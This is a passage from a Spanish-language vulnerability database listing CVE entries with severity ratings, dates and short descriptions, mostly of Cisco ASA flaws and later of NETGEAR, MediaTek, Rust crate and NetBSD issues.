    Condición de carrera en la función HTTP Deep Packet Inspection (DPI) en Cisco Adaptive Security Appliance (ASA) Software 8.2.x anterior a 8.2(5.46), 8.3.x anterior a 8.3(2.39), 8.4.x anterior a 8.4(5.5), 8.5.x anterior a 8.5(1.18), 8.6.x anterior a 8.6(1.12), 8.7.x anterior a 8.7(1.4), 9.0.x anterior a 9.0(1.4), y 9.1.x anterior a 9.1(1.2), que en ciertas condiciones que implican la opción spoof-server o ActiveX o inspección de respuesta de Java, permite a atacantes remotos provocar una denegación de servicio (recarga dispositivo) a través de una respuesta HTTP manipulada, también conocido como Bug ID CSCud37992.
  • CVE-2013-5513
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) 8.2.x Software anterior a 8,2 (5,46), 8.3.x anterior a 8,3 (2,39), 8.4.x anterior a 8,4 (7), 8.5.x anterior a 8,5 (1,18), 8.6.x anterior a 8.6 (1,12), 8.7.x anterior a 8,7 (1,7), 9.0.x anterior a 9,0 (3,3), y 9.1.x anterior a 9,1 (1,8), cuando el motor DNS ALPI está habilitado para TCP, lo que permite a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de paquetes TCP DNS manipulados, también conocido como Bug ID CSCug03975.
  • CVE-2013-5515
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    La función de Clientless SSL VPN de Cisco Adaptive Security Appliance (ASA) Software 8.x anteiror a 8,2 (5,44), 8.3.x anterior a 8,3 (2,39), 8.4.x anterior a 8,4 (5,7), 8.6.x anterior a 8.6 (1.12), 9.0.x anterior a 9,0 (2,6), y 9.1.x anterior a 9,1 (1,7) permite a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de peticiones HTTPS mannipuladas, también conocido como Bug ID CSCua22709.
  • CVE-2013-5511
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    La funcionalidad de gestión remota de Adaptive Security Device Management (ASDM) en Cisco Adaptive Security Appliance (ASA) Software 8.2.x anteriores a 8.2(5.46), 8.3.x anteriores a 8.3(2.39), 8.4.x anteriores a 8.4(6), 8.5.x anteriores a 8.5(1.18), 8.6.x anteriores a 8.6(1.12), 8.7.x anteriores a 8.7(1.7), 9.0.x anteriores a 9.0(3.1), y 9.1.x anteriores a 9.1(2.6) no implementa correctamente la opción de certificado de autenticación, lo cual permite a atacantes remotos sortear la autenticación a través de una sesión TCP a una interfaz ASDM, también conocido como Bug ID CSCuh44815.
  • CVE-2013-5510
    Severidad: MEDIA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    La implementación de acceso remoto VPN en Cisco Adaptive Security Appliance (ASA) Software 7.x anteriores a 7.2(5.12), 8.x anteriores a 8.2(5.46), 8.3.x anteriores a 8.3(2.39), 8.4.x anteriores a 8.4(6), 8.6.x anteriores a 8.6(1.12), 9.0.x anteriores a 9.0(3.1), y 9.1.x anteriores a 9.1(2.5), cuando una opción de "override-account-disable" se activa, no analiza correctamente respuestas AAA LDAP, lo cual permite a atacantes remotos sortear la autenticación a través de un intento de conexión VPN, también conocido como Bug ID CSCug83401.
  • CVE-2013-5509
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    La implementación SSL en Cisco Adaptive Security Appliance (ASA) 9.0 anterior a 9.0(2.6) y 9.1 anterior a 9.1(2) permite a atacantes remotos sortear la autenticación y obtener acceso VPN o acceso administrativo a través de un certificado de cliente X.509 manipulado, tambien conocido como Bug ID CSCuf52468.
  • CVE-2013-5508
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    El motor de SQL*Net inspection en Cisco Adaptive Security Appliance (ASA) 7.x anteriores a 7.2(5.12), 8.x anteriores a 8.2(5.44), 8.3.x anteriores a 8.3(2.39), 8.4.x anteriores a 8.4(6), 8.5.x anteriores a 8.5(1.18), 8.6.x anteriores a 8.6(1.12), 8.7.x anteriores a 8.7(1.6), 9.0.x anteriores a 9.0(2.10) y 9.1.x anteriores a 9.1(2) y Firewall Services Modue (FWSM) 3.1.x y 3.2.x anteriores a 3.2(27) y 4.x anteriores a 4.1(14) permite a atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de paquetes segmentados Transparent Network Substrate (TNS) manipulados, tambien conocido como Bug ID CSCub98434.
  • CVE-2013-3415
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.4.x anteriores a 8.4(3) y 8.6.x aanteriores 8.6(1.3) no maneja apropiadamente la memorua hasta la desconexión de un cliente VPN AnyConnect SSL, lo que permite a atacantes remotos causar una denegación de servicio (consumo de memoria, y corte de redirección o cuelgue de sistema) a través de paquetes a la dirección IP de la máquina desconectada, tambien conocido como Bug ID CSCtt36737.
  • CVE-2013-5507
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
    La implementacion IPSec en Cisco Adaptive Security Appliance (ASA) 9.1 anteriores a 9.2(1.7), cuando un tunel IPSec VPN está habilitado, permite a atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de un paquete (1) ICMP o (2) ICMPv6 que es manejado incorrectamente durante el descifrado, tambien conocido como Bug ID CSCue18975.
  • CVE-2016-6366
    Severidad: ALTA
    Fecha de publicación: 18/08/2016
    Fecha de última actualización: 15/08/2023
    Desbordamiento de búfer en Cisco Adaptive Security Applicance (ASA) Software hasta la versión 9.4.2.3 en dispositivos ASA 5500, ASA 5500-X, ASA Services Module, ASA 1000V, ASAv, Firepower 9300 ASA Security Module, PIX y FWSM permite a usuarios remotos autenticados ejecutar código arbitrario a través de paquetes IPv4 SNMP manipulados, también conocido como Bug ID CSCva92151 o EXTRABACON.
  • CVE-2016-1385
    Severidad: MEDIA
    Fecha de publicación: 26/05/2016
    Fecha de última actualización: 15/08/2023
    Vulnerabilidad en el intérprete XML en Cisco Adaptive Security Appliance (ASA) Software hasta la versión 9.5.2 permite a usuarios remotos autenticados provocar una denegación de servicio (inestabilidad, consumo de memoria o recarga de dispositivo) mediante el aprovechamiento de (1) acceso administrativo o (2) acceso VPN Clientless SSL para proporcionar un documento XML manipulado, también conocida como Bug ID CSCut14209.
  • CVE-2015-6326
    Severidad: ALTA
    Fecha de publicación: 25/10/2015
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) software 7.2 y 8.2 en versiones anteriores a 8.2(5.58), 8.3 y 8.4 en versiones anteriores a 8.4(7.29), 8.5 hasta la 8.7 en versiones anteriores a 8.7(1.17), 9.0 en versiones anteriores a 9.0(4.37), 9.1 en versiones anteriores a 9.1(6.6), 9.2 en versiones anteriores a 9.2(4), 9.3 en versiones anteriores a 9.3(3.5) y 9.4 en versiones anteriores a 9.4(1.5) permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de una respuesta DNS manipulada, también conocida como Bug ID CSCuu07799.
  • CVE-2016-1295
    Severidad: MEDIA
    Fecha de publicación: 16/01/2016
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 8.4 permite a atacantes remotos obtener información sensible a través de un intento de autenticación AnyConnect, también conocido como Bug ID CSCuo65775.
  • CVE-2012-4242
    Severidad: MEDIA
    Fecha de publicación: 01/10/2012
    Fecha de última actualización: 03/08/2023
    Vulnerabilidad de ejecución de secuencias de comandos en sitios cruzados (XSS) en el complemento MF Gig Calendar para WordPress, permite a atacantes remotos inyectar secuencias de comandos web o HTML a través de la cadena de consulta en la página de calendario.
  • CVE-2015-6327
    Severidad: ALTA
    Fecha de publicación: 25/10/2015
    Fecha de última actualización: 15/08/2023
    La implementación IKEv1 en Cisco Adaptive Security Appliance (ASA) software 7.2 y 8.2 en versiones anteriores a 8.2(5.58), 8.3 y 8.4 en versiones anteriores a 8.4(7.29), 8.5 hasta la 8.7 en versiones anteriores a 8.7(1.17), 9.0 en versiones anteriores a 9.0(4.37), 9.1 en versiones anteriores a 9.1(6.8), 9.2 en versiones anteriores a 9.2(4) y 9.3 en versiones anteriores a 9.3(3) permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de paquetes ISAKMP UDP manipulados, también conocida como Bug ID CSCus94026.
  • CVE-2015-6325
    Severidad: ALTA
    Fecha de publicación: 25/10/2015
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) software 7.2 y 8.2 en versiones anteriores a 8.2(5.58), 8.3 y 8.4 en versiones anteriores a 8.4(7.29), 8.5 hasta la 8.7 en versiones anteriores a 8.7(1.17), 9.0 en versiones anteriores a 9.0(4.37), 9.1 en versiones anteriores a 9.1(6.4), 9.2 en versiones anteriores a 9.2(4), 9.3 en versiones anteriores a 9.3(3.1) y 9.4 en versiones anteriores a 9.4(1.1) permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de una respuesta DNS manipulada, también conocida como Bug ID CSCut03495.
  • CVE-2015-6324
    Severidad: ALTA
    Fecha de publicación: 25/10/2015
    Fecha de última actualización: 15/08/2023
    La implementación DHCPv6 relay en Cisco Adaptive Security Appliance (ASA) software 9.0 en versiones anteriores a 9.0(4.37), 9.1 en versiones anteriores a 9.1(6.6), 9.2 en versiones anteriores a 9.2(4), 9.3 en versiones anteriores a 9.3(3.5) y 9.4 en versiones anteriores a 9.4(2) permite a atacantes remotos provocar una denegación de servicio (recarga de dispositivo) a través de paquetes DHCPv6 manipulados, también conocida como Bug IDs CSCus56252 y CSCus57142.
  • CVE-2016-1287
    Severidad: ALTA
    Fecha de publicación: 11/02/2016
    Fecha de última actualización: 15/08/2023
    Desbordamiento de buffer en las implementaciones IKEv1 y IKEv2 en Cisco ASA Software en versiones anteriores a 8.4(7.30), 8.7 en versiones anteriores a 8.7(1.18), 9.0 en versiones anteriores a 9.0(4.38), 9.1 en versiones anteriores a 9.1(7), 9.2 en versiones anteriores a 9.2(4.5), 9.3 en versiones anteriores a 9.3(3.7), 9.4 en versiones anteriores a 9.4(2.4) y 9.5 en versiones anteriores a 9.5(2.2) en dispositivos ASA 5500, dispositivos ASA 5500-X, ASA Services Module para dispositivos Cisco Catalyst 6500 y Cisco 7600, dispositivos ASA 1000V, Adaptive Security Virtual Appliance (también conocido como ASAv), dispositivos Firepower 9300 ASA Security Module y ISA 3000 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (reinicio de dispositivo) a través de paquetes UDP manipulados, también conocido como Bug IDs CSCux29978 y CSCux42019.
  • CVE-2015-0742
    Severidad: MEDIA
    Fecha de publicación: 21/05/2015
    Fecha de última actualización: 15/08/2023
    La aplicación Protocol Independent Multicast (PIM) en el software Cisco Adaptive Security Appliance (ASA) 9.2(0.0), 9.2(0.104), 9.2(3.1), 9.2(3.4), 9.3(1.105), 9.3(2.100), 9.4(0.115), 100.13(0.21), 100.13(20.3), 100.13(21.9), y 100.14(1.1) no implementa correctamente el registro del reenvío de multicast, lo que permite a atacantes remotos causar una denegación de servicio (interrupción de reenvío) a través de un paquete multicast manipulado, también conocido como Bug ID CSCus74398.
  • CVE-2012-0353
    Severidad: ALTA
    Fecha de publicación: 14/03/2012
    Fecha de última actualización: 15/08/2023
    El motor de inspección UDP de dispositivos de la serie Cisco Adaptive Security Appliances (ASA) 5500, y el ASA Services Module (ASASM) en dispositivos Cisco Catalyst 6500, con el software v8.0 a v8.2 antes de v8.2 (5.20), v8.3 antes de v8.3 (2.29), v8.4 antes de v8.4 (3), v8.5 antes de v8.5 (1.6), y v8.6 antes de v8.6 (1.1) permite a atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de paquetes UDP (1) IPv4 o (2) IPv6 manipulados, también conocido como Bug ID CSCtq10441.
  • CVE-2012-0354
    Severidad: ALTA
    Fecha de publicación: 14/03/2012
    Fecha de última actualización: 15/08/2023
    La función de detección de amenazas de dispositivos de la serie Cisco Adaptive Security Appliances (ASA) 5500, y el ASA Services Module (ASASM) en dispositivos Cisco Catalyst 6500, con el software v8.0 a v8.2 antes de v8.2 (5.20), v8.3 antes de v8.3 (2.29), v8.4 antes de v8.4 (3), v8.5 antes de v8.5 (1.6), y v8.6 antes de v8.6 (1.1) permite a atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de paquetes (1) IPv4 o (2) IPv6 que desencadenan un evento shun, también conocido como Bug ID CSCtw35765.
  • CVE-2012-0355
    Severidad: ALTA
    Fecha de publicación: 14/03/2012
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliances (ASA) 5500 Dispositivos de la serie, y el módulo de servicios de ASA (ASASM) en dispositivos cisco Catalyst 6500, con el software v8.4 antes v8.4 (2.11) y v8.5 los antes de v8.5 (1.4) permite una atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de paquetes (1) IPv4 o (2) IPv6 que disparan el mensaje syslog 305006, también conocido como Bug ID CSCts39634.
  • CVE-2012-0356
    Severidad: ALTA
    Fecha de publicación: 14/03/2012
    Fecha de última actualización: 15/08/2023
    Dispositivos de la serie Cisco Adaptive Security Appliances (ASA) 5500 y el Módulo de Servicios de ASA (ASASM) en dispositivos Cisco Catalyst 6500, con el software v7.0 a v7.2 antes de v7.2 (5.7), v8.0 antes de v8.0 (5.27), v8.1 antes de v8.1 (2.53) , v8.2 antes de v8.2 (5.8), v8.3 antes de v8.3 (2.25), v8.4 antes de v8.4 (2.5), y v8.5 antes de v8.5 (1.2) y el Firewall Services Module (FWSM) v3.1 y v3.2 antes de v3.2 (23) y v4.0 y v4.1 antes de v4.1 (8) en los dispositivos Cisco Catalyst 6500, cuando está habilitado el enrutamiento multicast, permite a atacantes remotos causar una denegación de servicio (recarga de dispositivo) a través de un mensaje IPv4 PIM modificado, también conocido como Bug ID CSCtr47517 y CSCtu97367.
  • CVE-2012-0358
    Severidad: ALTA
    Fecha de publicación: 14/03/2012
    Fecha de última actualización: 15/08/2023
    Desbordamiento de búfer en el puerto de Cisco Forwarder control ActiveX en cscopf.ocx, ya que distribuyen a través de la función Clientless VPN de Cisco Adaptive Security Appliances (ASA) 5500 dispositivos de la serie con el software v7.0 a v7.2 antes de v7.2 (5.6), v8.0 antes de v8.0 (5.26), v8.1 antes de v8.1 (2.53), v8.2 antes de v8.2 (5.18), v8.3 antes de v8.3 (2.28), v8.2 antes de v8.4 (2.16), y v8.6 antes de v8.6 (1.1), permite a atacantes remotos ejecutar código arbitrario a través de vectores no especificados, también conocido como Bug ID CSCtr00165.
  • CVE-2021-43888
    Severidad: MEDIA
    Fecha de publicación: 15/12/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Microsoft Defender for IoT
  • CVE-2020-25575
    Severidad: ALTA
    Fecha de publicación: 14/09/2020
    Fecha de última actualización: 17/08/2023
    ** NO COMPATIBLE CUANDO SE ASIGNÓ ** Se detectó un problema en la crate failure versiones hasta 0.1.5 para Rust. Presenta un fallo de confusión de tipo en el refinamiento de tipos. NOTA: Esta vulnerabilidad solo afecta a los productos que ya no son compatibles con el mantenedor. NOTA: Esto puede superponerse a CVE-2019-25010
  • CVE-2019-18910
    Severidad: MEDIA
    Fecha de publicación: 22/11/2019
    Fecha de última actualización: 20/07/2023
    La función de contenedor Citrix Receiver no maneja de forma segura la entrada suministrada por parte el usuario, lo que puede ser aprovechado por un atacante para inyectar comandos que se ejecutarán con privilegios de usuario local.
  • CVE-2021-30992
    Severidad: BAJA
    Fecha de publicación: 24/08/2021
    Fecha de última actualización: 08/08/2023
    Este problema se solucionó con un manejo de los metadatos de archivo mejorado. Este problema se solucionó en iOS versión 15.2 e iPadOS versión 15.2. Un usuario en una llamada de FaceTime puede filtrar inesperadamente información confidencial del usuario por medio de los metadatos de Live Photos
  • CVE-2021-42913
    Severidad: MEDIA
    Fecha de publicación: 20/12/2021
    Fecha de última actualización: 08/08/2023
    El servicio web SyncThru en las impresoras Samsung SCX-6x55X permite a un atacante conseguir acceso a una lista de usuarios SMB y contraseñas en texto sin cifrar al leer el código fuente HTML
  • CVE-2021-45419
    Severidad: MEDIA
    Fecha de publicación: 22/12/2021
    Fecha de última actualización: 08/08/2023
    Determinados productos de Starcharge están afectados por una Comprobación de Entrada Inapropiada. Los productos afectados son: Nova 360 Cabinet versiones anteriores a 1.3.0.0.7b102 incluyéndola - Corregido: Beta1.3.0.1.0 y Titan 180 Premium versiones anteriores a 1.3.0.0.6 incluyéndola - Corregido: 1.3.0.0.9
  • CVE-2021-29719
    Severidad: MEDIA
    Fecha de publicación: 03/12/2021
    Fecha de última actualización: 08/08/2023
    IBM Cognos Analytics versiones 11.1.7 y 11.2.0, podrían ser susceptibles a vulnerabilidades del lado del cliente debido a una respuesta web que especifica un tipo de contenido incorrecto. IBM X-Force ID: 201091
  • CVE-2021-40866
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Determinados smart switches de NETGEAR están afectados por un cambio de contraseña de administrador remoto por parte de un atacante no autenticado por medio del demonio /sqfs/bin/sccd (desactivado por defecto), que no comprueba la autenticación cuando falta el TLV de autenticación en un paquete NSDP recibido. Esto afecta a GC108P versiones anteriores a 1.0.8.2, GC108PP versiones anteriores a 1.0.8.2, GS108Tv3 versiones anteriores a 7.0.7.2, GS110TPP versiones anteriores a 7.0.7.2, GS110TPv3 versiones anteriores a 7. 0.7.2, GS110TUP versiones anteriores a 1.0.5.3, GS308T versiones anteriores a 1.0.3.2, GS310TP versiones anteriores a 1.0.3.2, GS710TUP versiones anteriores a 1.0.5.3, GS716TP versiones anteriores a 1.0.4. 2, GS716TPP versiones anteriores a 1.0.4.2, GS724TPP versiones anteriores a 2.0.6.3, GS724TPv2 versiones anteriores a 2.0.6.3, GS728TPPv2 versiones anteriores a 6.0.8.2, GS728TPv2 versiones anteriores a 6.0.8. 2, GS750E versiones anteriores a 1.0.1.10, GS752TPP versiones anteriores a 6.0.8.2, GS752TPv2 versiones anteriores a 6.0.8.2, MS510TXM versiones anteriores a 1.0.4.2 y MS510TXUP versiones anteriores a 1.0.4.2
  • CVE-2021-40867
    Severidad: MEDIA
    Fecha de publicación: 13/09/2021
    Fecha de última actualización: 08/08/2023
    Determinados smart switches de NETGEAR están afectados por una vulnerabilidad de secuestro de autenticación por parte de un atacante no autenticado que usa la misma dirección IP de origen que un administrador en el proceso de inicio de sesión (por ejemplo, detrás del mismo dispositivo NAT, o ya en posesión de un punto de apoyo en la máquina de un administrador). Esto ocurre porque el proceso de autenticación HTTP de varios pasos está efectivamente ligado sólo a la dirección IP de origen. Esto afecta a GC108P versiones anteriores a 1.0.8.2, GC108PP versiones anteriores a 1.0.8.2, GS108Tv3 versiones anteriores a 7.0.7.2, GS110TPP versiones anteriores a 7.0.7.2, GS110TPv3 versiones anteriores a 7. 0.7.2, GS110TUP versiones anteriores a 1.0.5.3, GS308T versiones anteriores a 1.0.3.2, GS310TP versiones anteriores a 1.0.3.2, GS710TUP versiones anteriores a 1.0.5.3, GS716TP versiones anteriores a 1.0.4. 2, GS716TPP versiones anteriores a 1.0.4.2, GS724TPP versiones anteriores a 2.0.6.3, GS724TPv2 versiones anteriores a 2.0.6.3, GS728TPPv2 versiones anteriores a 6.0.8.2, GS728TPv2 versiones anteriores a 6.0.8. 2, GS750E versiones anteriores a 1.0.1.10, GS752TPP versiones anteriores a 6.0.8.2, GS752TPv2 versiones anteriores a 6.0.8.2, MS510TXM versiones anteriores a 1.0.4.2 y MS510TXUP versiones anteriores a 1.0.4.2
  • CVE-2021-44525
    Severidad: ALTA
    Fecha de publicación: 20/12/2021
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine PAM360 versiones anteriores a la compilación 5303, permite a atacantes modificar algunos aspectos del estado de la aplicación debido a una omisión de filtro en la autenticación no es requerida
  • CVE-2021-44676
    Severidad: ALTA
    Fecha de publicación: 20/12/2021
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Access Manager Plus versiones anteriores a 4203, permite a cualquiera visualizar algunos elementos de datos (por ejemplo, detalles de control de acceso) y modificar algunos aspectos del estado de la aplicación
  • CVE-2021-45462
    Severidad: MEDIA
    Fecha de publicación: 23/12/2021
    Fecha de última actualización: 08/08/2023
    En Open5GS versión 2.4.0, un paquete diseñado desde el UE puede bloquear SGW-U/UPF
  • CVE-2021-45512
    Severidad: ALTA
    Fecha de publicación: 26/12/2021
    Fecha de última actualización: 08/08/2023
    Determinados dispositivos NETGEAR están afectados por una criptografía débil. Esto afecta a D7000v2 versiones anteriores a 1.0.0.62, D8500 versiones anteriores a 1.0.3.50, EX3700 versiones anteriores a 1.0.0.84, EX3800 versiones anteriores a 1.0.0.84, EX6120 versiones anteriores a 1.0.0. 54, EX6130 versiones anteriores a 1.0.0.36, EX7000 versiones anteriores a 1.0.1.90, R6250 versiones anteriores a 1.0.4.42, R6400v2 versiones anteriores a 1.0.4.98, R6700v3 versiones anteriores a 1.0.4.98, R6900P versiones anteriores a 1. 3.2.124, R7000 versiones anteriores a 1.0.11.106, R7000P versiones anteriores a 1.3.2.124, R7100LG versiones anteriores a 1.0.0.56, R7900 versiones anteriores a 1.0.4.26, R8000 versiones anteriores a 1.0.4. 58, R8300 versiones anteriores a 1.0.2.134, R8500 versiones anteriores a 1.0.2.134, RS400 versiones anteriores a 1.5.0.48, WNR3500Lv2 versiones anteriores a 1.2.0.62 y XR300 versiones anteriores a 1.0.3.50
  • CVE-2021-45494
    Severidad: BAJA
    Fecha de publicación: 26/12/2021
    Fecha de última actualización: 08/08/2023
    Determinados dispositivos NETGEAR están afectados por una capacidad de un atacante de leer archivos arbitrarios. Esto afecta a RBK352 versiones anteriores a 4.4.0.10, RBR350 versiones anteriores a 4.4.0.10 y RBS350 versiones anteriores a 4.4.0.10
  • CVE-2021-37571
    Severidad: ALTA
    Fecha de publicación: 25/12/2021
    Fecha de última actualización: 08/08/2023
    Los microchips de MediaTek, usados en los dispositivos de NETGEAR versiones hasta 11-11-2021 y otros dispositivos, manejan inapropiadamente los protocolos IEEE 1905. (Chipsets afectados MT7603E, MT7613, MT7615, MT7622, ??MT7628, MT7629, MT7915; Versiones de software afectadas 2.0.2; Escritura fuera de límites).
  • CVE-2021-23490
    Severidad: MEDIA
    Fecha de publicación: 24/12/2021
    Fecha de última actualización: 08/08/2023
    El paquete parse-link-header versiones anteriores a 2.0.0, es vulnerable a la Denegación de Servicio por Expresión Regular (ReDoS) por medio de la función checkHeader
  • CVE-2021-45687
    Severidad: MEDIA
    Fecha de publicación: 26/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la crate raw-cpuid versiones anteriores a 9.1.1 para Rust. Si es usada la funcionalidad serialize (que no es la predeterminada), una operación de deserialización puede carecer de la suficiente comprobación, conllevando a una corrupción de memoria o un pánico
  • CVE-2021-45696
    Severidad: ALTA
    Fecha de publicación: 26/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la crate sha2 versiones 0.9.7 anteriores a 0.9.8 para Rust. Los hash de los mensajes largos pueden ser incorrectos cuando es usado el backend acelerado AVX2
  • CVE-2021-45709
    Severidad: ALTA
    Fecha de publicación: 26/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la crate crypto2 versiones hasta 08-10-2021 para Rust. Durante el cifrado y descifrado de Chacha20, puede producirse una lectura no alineada de un u32
  • CVE-2021-45488
    Severidad: MEDIA
    Fecha de publicación: 25/12/2021
    Fecha de última actualización: 08/08/2023
    En NetBSD versiones hasta 9.2, se presenta un filtrado de información en el algoritmo de generación de TCP ISN (ISS)
  • CVE-2021-45487
    Severidad: MEDIA
    Fecha de publicación: 25/12/2021
    Fecha de última actualización: 08/08/2023
    En NetBSD versiones hasta 9.2, el algoritmo de generación de IPv4 ID no usa medidas criptográficas apropiadas
  • CVE-2021-45484
    Severidad: MEDIA
    Fecha de publicación: 25/12/2021
    Fecha de última actualización: 08/08/2023
    En NetBSD versiones hasta 9.2, el algoritmo de generación de ID de fragmentos IPv6 emplea un PRNG criptográfico débil
  • CVE-2021-45972
    Severidad: MEDIA
    Fecha de publicación: 01/01/2022
    Fecha de última actualización: 08/08/2023
    La función giftrans en giftrans versión 1.12.2, contiene un desbordamiento de búfer en la región stack de la memoria porque un valor dentro del archivo de entrada determina la cantidad de datos a escribir. Esto permite a un atacante sobrescribir hasta 250 bytes fuera del buffer asignado con datos arbitrarios.
  • CVE-2021-30262
    Severidad: MEDIA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    Una comprobación incorrecta del estado de un socket cuando son enviados eventos de socket a los clientes puede conllevar a un acceso no válido de memoria en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
  • CVE-2022-20020
    Severidad: BAJA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En libvcodecdrv, se presenta una posible divulgación de información debido a una falta de comprobación de límites. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05943906; ID de Incidencia: ALPS05943906
  • CVE-2022-20015
    Severidad: BAJA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En el controlador kd_camera_hw, se presenta una posible divulgación de información debido a datos no inicializados. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05862966; ID de Incidencia: ALPS05862966
  • CVE-2021-37112
    Severidad: MEDIA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    El módulo Hisuite presenta una vulnerabilidad de Control Externo del Sistema o de los Ajustes de Configuración. Una explotación con éxito de esta vulnerabilidad puede conllevar a un filtrado de Firmware
  • CVE-2022-20013
    Severidad: MEDIA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En el controlador vow, se presenta una posible corrupción de memoria debido a una condición de carrera. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05837742; ID de Incidencia: ALPS05837742
  • CVE-2022-20014
    Severidad: MEDIA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En el controlador vow, se presenta una posible corrupción de la memoria debido a una comprobación de entrada inapropiada. Esto podría conllevar a una escalada local de privilegios con los privilegios de ejecución System requeridos. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05857308; ID de Incidencia: ALPS05857308
  • CVE-2022-20019
    Severidad: BAJA
    Fecha de publicación: 04/01/2022
    Fecha de última actualización: 08/08/2023
    En libMtkOmxGsmDec, se presenta una posible divulgación de información debido a una comprobación de límites incorrecta. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. ID del Parche: ALPS05917620; ID de Incidencia: ALPS05917620
  • CVE-2021-21751
    Severidad: MEDIA
    Fecha de publicación: 27/12/2021
    Fecha de última actualización: 08/08/2023
    El producto ZTE BigVideo Analysis presenta una vulnerabilidad de verificación de entrada. Debido a la incoherencia entre las verificaciones anteriores y posteriores cuando es configurada la página de pantalla grande, un atacante con altos privilegios podría explotar esta vulnerabilidad para manipular la URL y causar una excepción de servicio
  • CVE-2021-44852
    Severidad: ALTA
    Fecha de publicación: 01/01/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en el archivo BS_RCIO64.sys en Biostar RACING GT Evo versión 2.1.1905.1700. Un proceso de baja integridad puede abrir el objeto de dispositivo del controlador y emitir IOCTL para leer o escribir en ubicaciones de memoria física arbitrarias (o llamar a una dirección arbitraria), conllevando a una ejecución de código arbitrario. Esto está asociado con 0x226040, 0x226044 y 0x226000.
  • CVE-2021-30289
    Severidad: ALTA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    Un posible desbordamiento del búfer debido a una falta de comprobación del rango mientras es procesado un comando DIAG para la administración de COEX en Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
  • CVE-2021-45832
    Severidad: MEDIA
    Fecha de publicación: 05/01/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Desbordamiento del Búfer en la región Stack de la memoria en HDF5 versión 1.13.1-1, en el archivo hdf5/src/H5Eint.c, que causa una Denegación de Servicio (dependiente del contexto).
  • CVE-2021-45896
    Severidad: MEDIA
    Fecha de publicación: 27/12/2021
    Fecha de última actualización: 08/08/2023
    Los dispositivos Nokia FastMile 3TG00118ABAD52 permiten una escalada de privilegios por parte de un usuario autenticado mediante is_ctc_admin=1 al archivo login_web_app.cgi y el uso de Import Config File
  • CVE-2021-46050
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de desbordamiento de pila en Binaryen versión 103, por medio de la función printf_common
  • CVE-2021-40005
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    El componente distributed data service presenta una vulnerabilidad en el control de acceso a los datos. Una explotación con éxito de esta vulnerabilidad puede afectar la confidencialidad de los datos
  • CVE-2021-37133
    Severidad: MEDIA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de acceso no autorizado a archivos en los Smartphones. Una explotación con éxito de esta vulnerabilidad puede afectar la confidencialidad del servicio
  • CVE-2021-39969
    Severidad: MEDIA
    Fecha de publicación: 03/01/2022
    Fecha de última actualización: 08/08/2023
